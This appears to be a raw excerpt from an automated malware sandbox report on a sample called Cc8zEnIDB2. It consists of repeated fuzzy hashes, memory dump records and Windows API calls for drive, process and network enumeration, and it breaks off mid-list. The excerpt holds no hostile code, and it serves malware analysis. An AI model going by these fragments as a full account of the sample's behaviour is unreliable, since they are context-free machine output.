                                                      • Instruction ID: c8dbbfb23ad226f31c7b0f0803bdb31f06cca7b078c65ce8321d2a89a26484fb
                                                      • Opcode Fuzzy Hash: 9ee50ab1fbb83203fa2fdf4235d79746c837bf79fe36e54fa88f1969b994b9a3
                                                      • Instruction Fuzzy Hash: 9E418BEB26C111FD714A85E22B14AFB576DE1CB730B32882AFC27D5582E3884E4D1131
                                                      APIs
                                                      • GetLogicalDrives.KERNELBASE(?,07150081,07150081), ref: 07150462
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1397951528.0000000007150000.00000040.00001000.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7150000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: DrivesLogical
                                                      • String ID: A:\
                                                      • API String ID: 999431828-3379428675
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID: FD %s:%d sclose(%d)
                                                      • API String ID: 2781271927-3116021458
                                                      APIs
                                                      • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0059B29E,?,00000000,?,?), ref: 0059B0B9
                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00583C41,00000000), ref: 0059B0C1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastconnect
                                                      • String ID:
                                                      • API String ID: 374722065-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Instruction Fuzzy Hash: ACE1E2EB26C123BDBA4A81452B54AF6677EE6CF730B328436F407C6682E3944F4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 549e70d688fb41bd7c1fdaa4ff87a4be4f9fd882d83d806f489d6a89ce3dc09b
                                                      • Instruction ID: 531802213188f069d7354b7ba95bc1f9374608fa281f7ecd6641304967421eb3
                                                      • Opcode Fuzzy Hash: 549e70d688fb41bd7c1fdaa4ff87a4be4f9fd882d83d806f489d6a89ce3dc09b
                                                      • Instruction Fuzzy Hash: BFE1D0EB26C113BDBA4A81452B54AF6677EE6CFB30B328436F407C6682E3944F4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 95692109dc283b01ace73d9be15fe2b718e1266a1ac11a37d07b961cef5d3128
                                                      • Instruction ID: 57f3dd22126fc10fce452ff686ea47afcde5a5a14c7454aa7b01b3361d9bb74c
                                                      • Opcode Fuzzy Hash: 95692109dc283b01ace73d9be15fe2b718e1266a1ac11a37d07b961cef5d3128
                                                      • Instruction Fuzzy Hash: F3E1D1EB26C123BDBA4A81452B54AF6677EE6CF730B328436F407C6682E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e68d85b16879c5f6c21b67425f528b574a776ab2dfb9416c59eba9cdd0a7bde
                                                      • Instruction ID: bd0ca141c2a7e4775930bea200a3f6a032a9af42c0ada2c250b77db16fe3d696
                                                      • Opcode Fuzzy Hash: 0e68d85b16879c5f6c21b67425f528b574a776ab2dfb9416c59eba9cdd0a7bde
                                                      • Instruction Fuzzy Hash: BFE1D4FB26C113BDBA4A81452B54AFA677EE6CF730B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 777eff891e8e17abcf299c34a827d5d7f40206793997f0d4f79bdacc2f9f7068
                                                      • Instruction ID: ebaf2e4a7466d4727f28b73a306d2521456dc4f41d4557430d261adfda0a3bda
                                                      • Opcode Fuzzy Hash: 777eff891e8e17abcf299c34a827d5d7f40206793997f0d4f79bdacc2f9f7068
                                                      • Instruction Fuzzy Hash: CAE1D3FB26C123BDBA4A81452B54AFA677EE6CF730B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4014da5cc140d0dc05c0ea7829e7f1c92a2cc493d609b6f4689a957f5774767f
                                                      • Instruction ID: f9bbb61aeaf6d99cd3753fd9cc78848cfc7b7d60aefa0e9a131443a3fd58a1a5
                                                      • Opcode Fuzzy Hash: 4014da5cc140d0dc05c0ea7829e7f1c92a2cc493d609b6f4689a957f5774767f
                                                      • Instruction Fuzzy Hash: 61D1B2FB16C123BDBA4A81452B54AF6677EE6CFB30B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9bb7fe57cc40e01e7d2194fbcb428a3c1512cd2e9a19d1e7c407ba237f9ac66c
                                                      • Instruction ID: a85ec61185b51bd18d5022de5536cf336eac634825ed38147e128dd9fb1e590c
                                                      • Opcode Fuzzy Hash: 9bb7fe57cc40e01e7d2194fbcb428a3c1512cd2e9a19d1e7c407ba237f9ac66c
                                                      • Instruction Fuzzy Hash: 7DD1C2EB16C113BDBA4A81452B54AF6677EE6CFB30B328436F407C6682E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad03654122ca067ae591b3b7988e8ee2fc307004a273771faab47306674a2bf6
                                                      • Instruction ID: 0eb32293138c51a3d5ad9da3531acfd82a044545c3fe67ca5b8b8b6183d1a0eb
                                                      • Opcode Fuzzy Hash: ad03654122ca067ae591b3b7988e8ee2fc307004a273771faab47306674a2bf6
                                                      • Instruction Fuzzy Hash: CAD1B2FB16C123BDBA4A81452B54AFA677EE6CFB30B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 99965fa358a2baa58c83c628dce7c9e4e7bc8dc439a180c2971583e2b7f4e457
                                                      • Instruction ID: a89152db60b2dc2e73ea850b0477cc71ef7d2fb162208ac608f6e91be754f0bc
                                                      • Opcode Fuzzy Hash: 99965fa358a2baa58c83c628dce7c9e4e7bc8dc439a180c2971583e2b7f4e457
                                                      • Instruction Fuzzy Hash: E9D1C3FB16C113BDBA4A81452B54AF6677EE6CF730B328436F407C6682E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1d3211ccae6992257941aa3c844385eae9a989da3892dcd746b8acd80276777f
                                                      • Instruction ID: 3fbb0db371a463e4a159e1ad42b730e1631bcab829b727f5db6c25746a8769dc
                                                      • Opcode Fuzzy Hash: 1d3211ccae6992257941aa3c844385eae9a989da3892dcd746b8acd80276777f
                                                      • Instruction Fuzzy Hash: FDD1D3EB26C113BDBA4A81452B54AFA677EE6CF730B328436F407C6682E3944F4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15b232d95836fbc19a0b8d613f967f27f6ee0999f8f23f371862411c1ea28289
                                                      • Instruction ID: 1a458aa7bae048ecdaeca30b97af4773d4425554618bf3a820c6456e96d12b90
                                                      • Opcode Fuzzy Hash: 15b232d95836fbc19a0b8d613f967f27f6ee0999f8f23f371862411c1ea28289
                                                      • Instruction Fuzzy Hash: 70D1D3FB26C113BDBA4A81452B54AF6677EE6CF730B328436F407C6682E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bdf95b1a535e93e6b70c72e13b7f42ab8eff1a4ea3e0deda899080c92930de22
                                                      • Instruction ID: 98247c1178ac81aec3845058d9ea08d89f7eeb39cb19af6366f8793f83ba998c
                                                      • Opcode Fuzzy Hash: bdf95b1a535e93e6b70c72e13b7f42ab8eff1a4ea3e0deda899080c92930de22
                                                      • Instruction Fuzzy Hash: 2CD1D2EB26C113BDBA4A81452B54AFA677EE6CF730B328436F407C6682E3944F4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b7c5a5bd918c528b26fed3e8deec1472b89a8b534746c4e598a599e99e452df3
                                                      • Instruction ID: 29da9033685b0dd22279a1570086d77929bd6f3e64ca393a4a7d87c4c835b1a7
                                                      • Opcode Fuzzy Hash: b7c5a5bd918c528b26fed3e8deec1472b89a8b534746c4e598a599e99e452df3
                                                      • Instruction Fuzzy Hash: 89C1A1FB26C113BDBA4A81452B54AFA677EE6CFB30B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a867c3bb7876ebf3c7aabffbde6b01efc435a1320bda4d0a22a8f0561d2c2fc
                                                      • Instruction ID: 7a7a8f9579b5b985e35eec18487a98dcc18343fd9429207a430bde65d5b4e01a
                                                      • Opcode Fuzzy Hash: 8a867c3bb7876ebf3c7aabffbde6b01efc435a1320bda4d0a22a8f0561d2c2fc
                                                      • Instruction Fuzzy Hash: 37C1A1FB26C123BDB94A81452B54AFA677EE6CFB30B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da618a35686cc5023c1fd0a83cfc9c9d9bdb54580d8f96e6e23b2858c8bcd83f
                                                      • Instruction ID: cb5f1e6df393b3a4a76f6800d51ac86538cde9ef1eaa8edcd9b48290a25bec1e
                                                      • Opcode Fuzzy Hash: da618a35686cc5023c1fd0a83cfc9c9d9bdb54580d8f96e6e23b2858c8bcd83f
                                                      • Instruction Fuzzy Hash: 25C1B1FB26C123BDBA4A81452B54AFA677EE6CF730B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6de4cc5c422615f8bfc965cad372022ac4477adffc170ce32ce6a12db329c57b
                                                      • Instruction ID: 0ee94778e99d43ed240167faecfe94f354cfc3e599d1176131eb2946c3cb0814
                                                      • Opcode Fuzzy Hash: 6de4cc5c422615f8bfc965cad372022ac4477adffc170ce32ce6a12db329c57b
                                                      • Instruction Fuzzy Hash: 06C1A1FB26C123BDBA4A81452B54AFA677EE6CF730B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e2470bb049c78a6fea5821df6fad231ef981cfeaab635bc84809892386426a2
                                                      • Instruction ID: 5099a844b98f3e67fbe98cdd053dc7d4def76522ad79d7b32152dde7f87bf220
                                                      • Opcode Fuzzy Hash: 3e2470bb049c78a6fea5821df6fad231ef981cfeaab635bc84809892386426a2
                                                      • Instruction Fuzzy Hash: 63C1B0FB26C113BDBA4A81452B54AFA677EE6CF730B328436F407C6682E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d434aa9385c1e674a45e742a2abcddbe7e803507acd5ab89c99e4e3544da8911
                                                      • Instruction ID: e94f3161c774d9250ba5c9dec5f971bdcc27e3017f7f3e5afd927bf86706056f
                                                      • Opcode Fuzzy Hash: d434aa9385c1e674a45e742a2abcddbe7e803507acd5ab89c99e4e3544da8911
                                                      • Instruction Fuzzy Hash: 43C1C1EB26C113BDBA4A81452B54AFA677EE6CFB30B328436F407C6582E3944B4B5171
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 813c432472d8c66ee590c968222348cc95d99cb4982a6bed974b8412abc4787d
                                                      • Instruction ID: 6918f6d5fa7b57c4301ea33f05d74674b25ece39b1ea2b52a7991095b5342a58
                                                      • Opcode Fuzzy Hash: 813c432472d8c66ee590c968222348cc95d99cb4982a6bed974b8412abc4787d
                                                      • Instruction Fuzzy Hash: 0DC1A1EB26C113BDBA4A81452B54AFA677EE6CFB30B328436F407C6582E3944B4B5171
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Instruction Fuzzy Hash: 8EA1C3EB26C113BDBA4A81452B54AFA677EE6CFB30B328436F407C6582E3944F4B5171
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: a6b5606fd5b38d49db11ca58e905c273f6d9435d8857305234ed21a25cdcbb54
                                                      • Instruction ID: 1dec5fdc345c05e432dc9e7ac9fdd996788f4dfc47a04d12309228f8233a8046
                                                      • Opcode Fuzzy Hash: a6b5606fd5b38d49db11ca58e905c273f6d9435d8857305234ed21a25cdcbb54
                                                      • Instruction Fuzzy Hash: 5CA1F5E726C113BDBA0A85451B54AFA677EE6CF730B328436F407C6582E3944F4B41B1
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: decffc0a17ab5345dc4309ac2b902bd9a776fa75f8e89d684158b58d617c11f9
                                                      • Instruction ID: 24d52994f53a6d2d6c3591aa71405cbbde1f51da3a2a2056ac8a8871ebcdf5d7
                                                      • Opcode Fuzzy Hash: decffc0a17ab5345dc4309ac2b902bd9a776fa75f8e89d684158b58d617c11f9
                                                      • Instruction Fuzzy Hash: 20A1E4E726C113BDBA4A81451B50AFA677EE6DF730B328436F40BC6582E3944F4B5171
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: f3ad3e2432fd64a32c3113d260997c52c6705c2ab95cf9e4f19040ae3a6083b7
                                                      • Instruction ID: af3c59209676fca012358250c7283088675216aef889ee246520e90087a061bb
                                                      • Opcode Fuzzy Hash: f3ad3e2432fd64a32c3113d260997c52c6705c2ab95cf9e4f19040ae3a6083b7
                                                      • Instruction Fuzzy Hash: BDA1F3EB26C113BDBA4A81451B50AFA677EE6CF730B328436F40BC6682E3944F4B5171
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 915c4d9b364798d8d9ac33a5e6e94c411229ef2c1cf78aee760e9d04d2347789
                                                      • Instruction ID: cd87999173c44c609c1538d5a4ce23558f9c5482603e0e45354c2efaae2b2439
                                                      • Opcode Fuzzy Hash: 915c4d9b364798d8d9ac33a5e6e94c411229ef2c1cf78aee760e9d04d2347789
                                                      • Instruction Fuzzy Hash: 27A104FB26C113BDBA4A81451B50AFA677EE6CFB30B328436F407C6682E3944B4B4571
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 1359bec49f3efa8e9cd7c8c6105dcbdbd9e1c84faeb3993e91ea7193029ea2df
                                                      • Instruction ID: 76f471a6652a8e983b0aa63198f91099c4da042acfdd1fdda6ec196e59fb48e9
                                                      • Opcode Fuzzy Hash: 1359bec49f3efa8e9cd7c8c6105dcbdbd9e1c84faeb3993e91ea7193029ea2df
                                                      • Instruction Fuzzy Hash: 8A9113EB26C113BDBA0981451B50AF6677EE6CF730F328436F40BC6582E3904E4B4571
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 768eaac87d863b39cdea228f22b0a875fbdeba762aeb38d07cff6d8065bf8ef1
                                                      • Instruction ID: 463b07afbf4fbe0fa1d64579fbed3319f95e2a560f5ea1ecdd37c823daf4d70f
                                                      • Opcode Fuzzy Hash: 768eaac87d863b39cdea228f22b0a875fbdeba762aeb38d07cff6d8065bf8ef1
                                                      • Instruction Fuzzy Hash: 8991F5EB26C113BDBA0981452B50AFA677EE6DF730F328436F40BC6581E3944B4B55B1
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: 3d9890a12bbf83ec8b4c1176b4dfc090de431232de933e6ce92c14f88af01ee0
                                                      • Instruction ID: c99dfdab9677473d4b9b7079a50b2da3c1a59de8068bf9424f7b5b2ef8c6d6df
                                                      • Opcode Fuzzy Hash: 3d9890a12bbf83ec8b4c1176b4dfc090de431232de933e6ce92c14f88af01ee0
                                                      • Instruction Fuzzy Hash: E191F2EB26C113BDBA0985452B50AF6A77EE6CFB30F328836F40BC6581E3904B4B5571
                                                      APIs
                                                      • Process32FirstW.KERNEL32(45E3E9BB,45E3E9BB,45E3E9BB,?), ref: 07190560
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398026700.0000000007190000.00000040.00001000.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7190000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID:
                                                      • API String ID: 2623510744-0
                                                      • Opcode ID: cb64d7ff43adb33e7775fdae8cf21aeb239a93ab5dfd742a136b567196b5dc37
                                                      • Instruction ID: bb602dd98c03e1bdbece7c2f893e7427a44150c7aa30b600bc85c99a326b48d1
                                                      • Opcode Fuzzy Hash: cb64d7ff43adb33e7775fdae8cf21aeb239a93ab5dfd742a136b567196b5dc37
                                                      • Instruction Fuzzy Hash: E491F3E766C113BDBA0981451B50AF6677EE6CF730B328436F40BC6582E3944F4B5571
                                                      APIs
                                                      • gethostname.WS2_32(00000000,00000040), ref: 00584AA5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000AEA000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D74000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000D78000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E4F000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E59000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395770755.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396065369.0000000000E68000.00000080.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396176817.0000000001018000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396196650.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1396213416.000000000101B000.00000080.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_Cc8zEnIDB2.jbxd
                                                      Similarity
                                                      • API ID: gethostname
                                                      • String ID:
                                                      • API String ID: 144339138-0
                                                      • Opcode ID: 6950bb6b74c2921dee4112392ae5159a9ddecbf4ab98acc767a37c4525cf0b03
                                                      • Instruction ID: 973e7c73c6184a2a009a63f64da57a7cef4c0b485d07cb79f40c3bebed9477b0
                                                      • Opcode Fuzzy Hash: 6950bb6b74c2921dee4112392ae5159a9ddecbf4ab98acc767a37c4525cf0b03
                                                      • Instruction Fuzzy Hash: 1051BC706047028BEB30AB65DD497277EE4BF4531AF14183DED8AAB691E775E884CF02
                                                      APIs
                                                      • getsockname.WS2_32(?,?,00000080), ref: 0059AFD1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1395232706.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1395188158.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395232706.0000000000AE5000.00000040.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1395751582.0000000000AE8000.00000004.00000001.01000000.00000003.sdmp
